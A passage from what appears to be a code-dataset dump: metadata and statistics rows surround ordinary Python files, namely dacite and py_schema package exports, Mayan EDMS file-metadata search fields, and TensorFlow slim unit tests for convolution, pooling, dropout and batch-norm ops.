| 13.833333 | 25 | 0.686747 | 16 | 83 | 3.5625 | 0.6875 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068493 | 0.120482 | 83 | 5 | 26 | 16.6 | 0.712329 | 0.277108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
138a0a681098fab43521d30ef1a1954f6596c394 | 527 | py | Python | dacite/__init__.py | daiwt/dacite | 9fe2f3d5fabc44bde4b0ba28eda44f8071c358cc | [
"MIT"
] | 971 | 2018-03-06T19:53:24.000Z | 2022-03-31T11:53:00.000Z | dacite/__init__.py | daiwt/dacite | 9fe2f3d5fabc44bde4b0ba28eda44f8071c358cc | [
"MIT"
] | 142 | 2018-04-19T00:37:01.000Z | 2022-03-29T00:18:08.000Z | dacite/__init__.py | daiwt/dacite | 9fe2f3d5fabc44bde4b0ba28eda44f8071c358cc | [
"MIT"
] | 63 | 2018-03-31T16:05:16.000Z | 2022-03-28T12:24:13.000Z | from dacite.config import Config
from dacite.core import from_dict
from dacite.exceptions import (
DaciteError,
DaciteFieldError,
WrongTypeError,
MissingValueError,
UnionMatchError,
StrictUnionMatchError,
ForwardReferenceError,
UnexpectedDataError,
)
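# re-export the public names so they are importable directly from the dacite package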
__all__ = [
"Config",
"from_dict",
"DaciteError",
"DaciteFieldError",
"WrongTypeError",
"MissingValueError",
"UnionMatchError",
"StrictUnionMatchError",
"ForwardReferenceError",
"UnexpectedDataError",
]
| 20.269231 | 33 | 0.70778 | 35 | 527 | 10.485714 | 0.457143 | 0.081744 | 0.223433 | 0.316076 | 0.730245 | 0.730245 | 0.730245 | 0.730245 | 0 | 0 | 0 | 0 | 0.204934 | 527 | 25 | 34 | 21.08 | 0.875895 | 0 | 0 | 0 | 0 | 0 | 0.282732 | 0.079696 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13a0dff32a551463f295bbef33c5df6a8a6c9560 | 24 | py | Python | py_schema/__init__.py | benhurott/py_schema | a0beab16bd91760942dc88942a65b480ec980ad8 | [
"MIT"
] | null | null | null | py_schema/__init__.py | benhurott/py_schema | a0beab16bd91760942dc88942a65b480ec980ad8 | [
"MIT"
] | 4 | 2019-07-28T19:35:07.000Z | 2021-06-02T00:15:57.000Z | py_schema/__init__.py | benhurott/py_schema | a0beab16bd91760942dc88942a65b480ec980ad8 | [
"MIT"
] | null | null | null | from .py_schema import * | 24 | 24 | 0.791667 | 4 | 24 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 24 | 1 | 24 | 24 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13c0b61b1530188fe35d913af504a7629298f5c3 | 1,012 | py | Python | mayan/apps/file_metadata/search.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 343 | 2015-01-05T14:19:35.000Z | 2018-12-10T19:07:48.000Z | mayan/apps/file_metadata/search.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 191 | 2015-01-03T00:48:19.000Z | 2018-11-30T09:10:25.000Z | mayan/apps/file_metadata/search.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 257 | 2019-05-14T10:26:37.000Z | 2022-03-30T03:37:36.000Z | from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.search import (
document_file_search, document_file_page_search, document_search
)
# Document
document_search.add_model_field(
field='files__file_metadata_drivers__entries__key',
label=_('File metadata key')
)
document_search.add_model_field(
field='files__file_metadata_drivers__entries__value',
label=_('File metadata value')
)
# Document file
document_file_search.add_model_field(
field='file_metadata_drivers__entries__key',
label=_('File metadata key')
)
document_file_search.add_model_field(
field='file_metadata_drivers__entries__value',
label=_('File metadata value')
)
# Document file page
document_file_page_search.add_model_field(
field='document_file__file_metadata_drivers__entries__key',
label=_('File metadata key')
)
document_file_page_search.add_model_field(
field='document_file__file_metadata_drivers__entries__value',
label=_('File metadata value')
)
| 25.948718 | 68 | 0.800395 | 131 | 1,012 | 5.541985 | 0.19084 | 0.198347 | 0.115702 | 0.157025 | 0.798898 | 0.798898 | 0.798898 | 0.798898 | 0.798898 | 0.761708 | 0 | 0 | 0.116601 | 1,012 | 38 | 69 | 26.631579 | 0.812081 | 0.040514 | 0 | 0.428571 | 0 | 0 | 0.380558 | 0.268873 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13dc5d9aacf6e283540a406d419a67d2d7215161 | 29,242 | py | Python | research/inception/inception/slim/ops_test.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 3,326 | 2018-01-26T22:42:25.000Z | 2022-02-16T13:16:39.000Z | research/inception/inception/slim/ops_test.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 150 | 2017-08-28T14:59:36.000Z | 2022-03-11T23:21:35.000Z | research/inception/inception/slim/ops_test.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 1,474 | 2018-02-01T04:33:18.000Z | 2022-03-08T07:02:20.000Z | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from inception.slim import ops
from inception.slim import scopes
from inception.slim import variables
class ConvTest(tf.test.TestCase):
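"""Tests for ops.conv2d."""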
def testCreateConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 32])
def testCreateSquareConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, 3)
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 32])
def testCreateConvWithTensorShape(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, images.get_shape()[1:3])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 32])
def testCreateFullyConv(self):
height, width = 6, 6
with self.test_session():
images = tf.random_uniform((5, height, width, 32), seed=1)
output = ops.conv2d(images, 64, images.get_shape()[1:3], padding='VALID')
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 64])
def testCreateVerticalConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 1])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(),
[5, height, width, 32])
def testCreateHorizontalConv(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [1, 3])
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(),
[5, height, width, 32])
def testCreateConvWithStride(self):
height, width = 6, 6
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], stride=2)
self.assertEquals(output.op.name, 'Conv/Relu')
self.assertListEqual(output.get_shape().as_list(),
[5, height // 2, width // 2, 32])
def testCreateConvCreatesWeightsAndBiasesVars(self):
height, width = 3, 3
images = tf.random_uniform((5, height, width, 3), seed=1)
with self.test_session():
self.assertFalse(variables.get_variables('conv1/weights'))
self.assertFalse(variables.get_variables('conv1/biases'))
ops.conv2d(images, 32, [3, 3], scope='conv1')
self.assertTrue(variables.get_variables('conv1/weights'))
self.assertTrue(variables.get_variables('conv1/biases'))
def testCreateConvWithScope(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], scope='conv1')
self.assertEquals(output.op.name, 'conv1/Relu')
def testCreateConvWithoutActivation(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], activation=None)
self.assertEquals(output.op.name, 'Conv/BiasAdd')
def testCreateConvValid(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.conv2d(images, 32, [3, 3], padding='VALID')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 32])
def testCreateConvWithWD(self):
height, width = 3, 3
with self.test_session() as sess:
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], weight_decay=0.01)
wd = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0]
self.assertEquals(wd.op.name,
'Conv/weights/Regularizer/L2Regularizer/value')
sess.run(tf.global_variables_initializer())
self.assertTrue(sess.run(wd) <= 0.01)
def testCreateConvWithoutWD(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], weight_decay=0)
self.assertEquals(
tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES), [])
def testReuseVars(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], scope='conv1')
self.assertEquals(len(variables.get_variables()), 2)
ops.conv2d(images, 32, [3, 3], scope='conv1', reuse=True)
self.assertEquals(len(variables.get_variables()), 2)
def testNonReuseVars(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3])
self.assertEquals(len(variables.get_variables()), 2)
ops.conv2d(images, 32, [3, 3])
self.assertEquals(len(variables.get_variables()), 4)
def testReuseConvWithWD(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.conv2d(images, 32, [3, 3], weight_decay=0.01, scope='conv1')
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
ops.conv2d(images, 32, [3, 3], weight_decay=0.01, scope='conv1',
reuse=True)
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
def testConvWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 32), seed=1)
with scopes.arg_scope([ops.conv2d], batch_norm_params={'decay': 0.9}):
net = ops.conv2d(images, 32, [3, 3])
net = ops.conv2d(net, 32, [3, 3])
self.assertEquals(len(variables.get_variables()), 8)
self.assertEquals(len(variables.get_variables('Conv/BatchNorm')), 3)
self.assertEquals(len(variables.get_variables('Conv_1/BatchNorm')), 3)
def testReuseConvWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 32), seed=1)
with scopes.arg_scope([ops.conv2d], batch_norm_params={'decay': 0.9}):
net = ops.conv2d(images, 32, [3, 3], scope='Conv')
net = ops.conv2d(net, 32, [3, 3], scope='Conv', reuse=True)
self.assertEquals(len(variables.get_variables()), 4)
self.assertEquals(len(variables.get_variables('Conv/BatchNorm')), 3)
self.assertEquals(len(variables.get_variables('Conv_1/BatchNorm')), 0)
class FCTest(tf.test.TestCase):
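"""Tests for ops.fc."""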
def testCreateFC(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
output = ops.fc(inputs, 32)
self.assertEquals(output.op.name, 'FC/Relu')
self.assertListEqual(output.get_shape().as_list(), [5, 32])
def testCreateFCWithScope(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
output = ops.fc(inputs, 32, scope='fc1')
self.assertEquals(output.op.name, 'fc1/Relu')
def testCreateFcCreatesWeightsAndBiasesVars(self):
height, width = 3, 3
inputs = tf.random_uniform((5, height * width * 3), seed=1)
with self.test_session():
self.assertFalse(variables.get_variables('fc1/weights'))
self.assertFalse(variables.get_variables('fc1/biases'))
ops.fc(inputs, 32, scope='fc1')
self.assertTrue(variables.get_variables('fc1/weights'))
self.assertTrue(variables.get_variables('fc1/biases'))
def testReuseVars(self):
height, width = 3, 3
inputs = tf.random_uniform((5, height * width * 3), seed=1)
with self.test_session():
ops.fc(inputs, 32, scope='fc1')
self.assertEquals(len(variables.get_variables('fc1')), 2)
ops.fc(inputs, 32, scope='fc1', reuse=True)
self.assertEquals(len(variables.get_variables('fc1')), 2)
def testNonReuseVars(self):
height, width = 3, 3
inputs = tf.random_uniform((5, height * width * 3), seed=1)
with self.test_session():
ops.fc(inputs, 32)
self.assertEquals(len(variables.get_variables('FC')), 2)
ops.fc(inputs, 32)
self.assertEquals(len(variables.get_variables('FC')), 4)
def testCreateFCWithoutActivation(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
output = ops.fc(inputs, 32, activation=None)
self.assertEquals(output.op.name, 'FC/xw_plus_b')
def testCreateFCWithWD(self):
height, width = 3, 3
with self.test_session() as sess:
inputs = tf.random_uniform((5, height * width * 3), seed=1)
ops.fc(inputs, 32, weight_decay=0.01)
wd = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0]
self.assertEquals(wd.op.name,
'FC/weights/Regularizer/L2Regularizer/value')
sess.run(tf.global_variables_initializer())
self.assertTrue(sess.run(wd) <= 0.01)
def testCreateFCWithoutWD(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
ops.fc(inputs, 32, weight_decay=0)
self.assertEquals(
tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES), [])
def testReuseFCWithWD(self):
height, width = 3, 3
with self.test_session():
inputs = tf.random_uniform((5, height * width * 3), seed=1)
ops.fc(inputs, 32, weight_decay=0.01, scope='fc')
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
ops.fc(inputs, 32, weight_decay=0.01, scope='fc', reuse=True)
self.assertEquals(len(variables.get_variables()), 2)
self.assertEquals(
len(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)), 1)
def testFCWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height * width * 3), seed=1)
with scopes.arg_scope([ops.fc], batch_norm_params={}):
net = ops.fc(images, 27)
net = ops.fc(net, 27)
self.assertEquals(len(variables.get_variables()), 8)
self.assertEquals(len(variables.get_variables('FC/BatchNorm')), 3)
self.assertEquals(len(variables.get_variables('FC_1/BatchNorm')), 3)
def testReuseFCWithBatchNorm(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height * width * 3), seed=1)
with scopes.arg_scope([ops.fc], batch_norm_params={'decay': 0.9}):
net = ops.fc(images, 27, scope='fc1')
net = ops.fc(net, 27, scope='fc1', reuse=True)
self.assertEquals(len(variables.get_variables()), 4)
self.assertEquals(len(variables.get_variables('fc1/BatchNorm')), 3)
class MaxPoolTest(tf.test.TestCase):
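"""Tests for ops.max_pool."""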
def testCreateMaxPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3])
self.assertEquals(output.op.name, 'MaxPool/MaxPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateSquareMaxPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, 3)
self.assertEquals(output.op.name, 'MaxPool/MaxPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateMaxPoolWithScope(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3], scope='pool1')
self.assertEquals(output.op.name, 'pool1/MaxPool')
def testCreateMaxPoolSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3], padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, 2, 2, 3])
def testCreateMaxPoolStrideSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, [3, 3], stride=1, padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 3])
def testGlobalMaxPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.max_pool(images, images.get_shape()[1:3], stride=1)
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
class AvgPoolTest(tf.test.TestCase):
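"""Tests for ops.avg_pool."""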
def testCreateAvgPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3])
self.assertEquals(output.op.name, 'AvgPool/AvgPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateSquareAvgPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, 3)
self.assertEquals(output.op.name, 'AvgPool/AvgPool')
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
def testCreateAvgPoolWithScope(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3], scope='pool1')
self.assertEquals(output.op.name, 'pool1/AvgPool')
def testCreateAvgPoolSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3], padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, 2, 2, 3])
def testCreateAvgPoolStrideSAME(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, [3, 3], stride=1, padding='SAME')
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 3])
def testGlobalAvgPool(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.avg_pool(images, images.get_shape()[1:3], stride=1)
self.assertListEqual(output.get_shape().as_list(), [5, 1, 1, 3])
class OneHotEncodingTest(tf.test.TestCase):
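"""Tests for ops.one_hot_encoding."""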
def testOneHotEncodingCreate(self):
with self.test_session():
labels = tf.constant([0, 1, 2])
output = ops.one_hot_encoding(labels, num_classes=3)
self.assertEquals(output.op.name, 'OneHotEncoding/SparseToDense')
self.assertListEqual(output.get_shape().as_list(), [3, 3])
def testOneHotEncoding(self):
with self.test_session():
labels = tf.constant([0, 1, 2])
one_hot_labels = tf.constant([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
output = ops.one_hot_encoding(labels, num_classes=3)
self.assertAllClose(output.eval(), one_hot_labels.eval())
class DropoutTest(tf.test.TestCase):
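"""Tests for ops.dropout."""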
def testCreateDropout(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.dropout(images)
self.assertEquals(output.op.name, 'Dropout/dropout/mul')
output.get_shape().assert_is_compatible_with(images.get_shape())
def testCreateDropoutNoTraining(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1, name='images')
output = ops.dropout(images, is_training=False)
self.assertEquals(output, images)
class FlattenTest(tf.test.TestCase):
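"""Tests for ops.flatten."""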
def testFlatten4D(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1, name='images')
output = ops.flatten(images)
self.assertEquals(output.get_shape().num_elements(),
images.get_shape().num_elements())
self.assertEqual(output.get_shape()[0], images.get_shape()[0])
def testFlatten3D(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width), seed=1, name='images')
output = ops.flatten(images)
self.assertEquals(output.get_shape().num_elements(),
images.get_shape().num_elements())
self.assertEqual(output.get_shape()[0], images.get_shape()[0])
def testFlattenBatchSize(self):
height, width = 3, 3
with self.test_session() as sess:
images = tf.random_uniform((5, height, width, 3), seed=1, name='images')
inputs = tf.placeholder(tf.int32, (None, height, width, 3))
output = ops.flatten(inputs)
self.assertEquals(output.get_shape().as_list(),
[None, height * width * 3])
output = sess.run(output, {inputs: images.eval()})
self.assertEquals(output.size,
images.get_shape().num_elements())
self.assertEqual(output.shape[0], images.get_shape()[0])
class BatchNormTest(tf.test.TestCase):
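"""Tests for ops.batch_norm."""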
def testCreateOp(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
output = ops.batch_norm(images)
self.assertTrue(output.op.name.startswith('BatchNorm/batchnorm'))
self.assertListEqual(output.get_shape().as_list(), [5, height, width, 3])
def testCreateVariables(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images)
beta = variables.get_variables_by_name('beta')[0]
self.assertEquals(beta.op.name, 'BatchNorm/beta')
gamma = variables.get_variables_by_name('gamma')
self.assertEquals(gamma, [])
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testCreateVariablesWithScale(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scale=True)
beta = variables.get_variables_by_name('beta')[0]
gamma = variables.get_variables_by_name('gamma')[0]
self.assertEquals(beta.op.name, 'BatchNorm/beta')
self.assertEquals(gamma.op.name, 'BatchNorm/gamma')
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testCreateVariablesWithoutCenterWithScale(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, center=False, scale=True)
beta = variables.get_variables_by_name('beta')
self.assertEquals(beta, [])
gamma = variables.get_variables_by_name('gamma')[0]
self.assertEquals(gamma.op.name, 'BatchNorm/gamma')
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testCreateVariablesWithoutCenterWithoutScale(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, center=False, scale=False)
beta = variables.get_variables_by_name('beta')
self.assertEquals(beta, [])
gamma = variables.get_variables_by_name('gamma')
self.assertEquals(gamma, [])
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testMovingAverageVariables(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scale=True)
moving_mean = tf.moving_average_variables()[0]
moving_variance = tf.moving_average_variables()[1]
self.assertEquals(moving_mean.op.name, 'BatchNorm/moving_mean')
self.assertEquals(moving_variance.op.name, 'BatchNorm/moving_variance')
def testUpdateOps(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
update_moving_mean = update_ops[0]
update_moving_variance = update_ops[1]
self.assertEquals(update_moving_mean.op.name,
'BatchNorm/AssignMovingAvg')
self.assertEquals(update_moving_variance.op.name,
'BatchNorm/AssignMovingAvg_1')
def testReuseVariables(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scale=True, scope='bn')
ops.batch_norm(images, scale=True, scope='bn', reuse=True)
beta = variables.get_variables_by_name('beta')
gamma = variables.get_variables_by_name('gamma')
self.assertEquals(len(beta), 1)
self.assertEquals(len(gamma), 1)
moving_vars = tf.get_collection('moving_vars')
self.assertEquals(len(moving_vars), 2)
def testReuseUpdateOps(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
ops.batch_norm(images, scope='bn')
self.assertEquals(len(tf.get_collection(ops.UPDATE_OPS_COLLECTION)), 2)
ops.batch_norm(images, scope='bn', reuse=True)
self.assertEquals(len(tf.get_collection(ops.UPDATE_OPS_COLLECTION)), 4)
def testCreateMovingVars(self):
height, width = 3, 3
with self.test_session():
images = tf.random_uniform((5, height, width, 3), seed=1)
_ = ops.batch_norm(images, moving_vars='moving_vars')
moving_mean = tf.get_collection('moving_vars',
'BatchNorm/moving_mean')
self.assertEquals(len(moving_mean), 1)
self.assertEquals(moving_mean[0].op.name, 'BatchNorm/moving_mean')
moving_variance = tf.get_collection('moving_vars',
'BatchNorm/moving_variance')
self.assertEquals(len(moving_variance), 1)
self.assertEquals(moving_variance[0].op.name, 'BatchNorm/moving_variance')
def testComputeMovingVars(self):
height, width = 3, 3
with self.test_session() as sess:
image_shape = (10, height, width, 3)
image_values = np.random.rand(*image_shape)
expected_mean = np.mean(image_values, axis=(0, 1, 2))
expected_var = np.var(image_values, axis=(0, 1, 2))
images = tf.constant(image_values, shape=image_shape, dtype=tf.float32)
output = ops.batch_norm(images, decay=0.1)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
with tf.control_dependencies(update_ops):
output = tf.identity(output)
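# wrapping in tf.identity under control_dependencies forces the moving-average update ops to run whenever output is evaluated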
# Initialize all variables
sess.run(tf.global_variables_initializer())
moving_mean = variables.get_variables('BatchNorm/moving_mean')[0]
moving_variance = variables.get_variables('BatchNorm/moving_variance')[0]
mean, variance = sess.run([moving_mean, moving_variance])
# After initialization moving_mean == 0 and moving_variance == 1.
self.assertAllClose(mean, [0] * 3)
self.assertAllClose(variance, [1] * 3)
for _ in range(10):
sess.run([output])
mean = moving_mean.eval()
variance = moving_variance.eval()
# After 10 updates with decay 0.1 moving_mean == expected_mean and
# moving_variance == expected_var.
self.assertAllClose(mean, expected_mean)
self.assertAllClose(variance, expected_var)
def testEvalMovingVars(self):
height, width = 3, 3
with self.test_session() as sess:
image_shape = (10, height, width, 3)
image_values = np.random.rand(*image_shape)
expected_mean = np.mean(image_values, axis=(0, 1, 2))
expected_var = np.var(image_values, axis=(0, 1, 2))
images = tf.constant(image_values, shape=image_shape, dtype=tf.float32)
output = ops.batch_norm(images, decay=0.1, is_training=False)
update_ops = tf.get_collection(ops.UPDATE_OPS_COLLECTION)
with tf.control_dependencies(update_ops):
output = tf.identity(output)
# Initialize all variables
sess.run(tf.global_variables_initializer())
moving_mean = variables.get_variables('BatchNorm/moving_mean')[0]
moving_variance = variables.get_variables('BatchNorm/moving_variance')[0]
mean, variance = sess.run([moving_mean, moving_variance])
# After initialization moving_mean == 0 and moving_variance == 1.
self.assertAllClose(mean, [0] * 3)
self.assertAllClose(variance, [1] * 3)
# Simulate assignment from saver restore.
init_assigns = [tf.assign(moving_mean, expected_mean),
tf.assign(moving_variance, expected_var)]
sess.run(init_assigns)
for _ in range(10):
sess.run([output], {images: np.random.rand(*image_shape)})
mean = moving_mean.eval()
variance = moving_variance.eval()
# Although we feed different images, the moving_mean and moving_variance
# shouldn't change.
self.assertAllClose(mean, expected_mean)
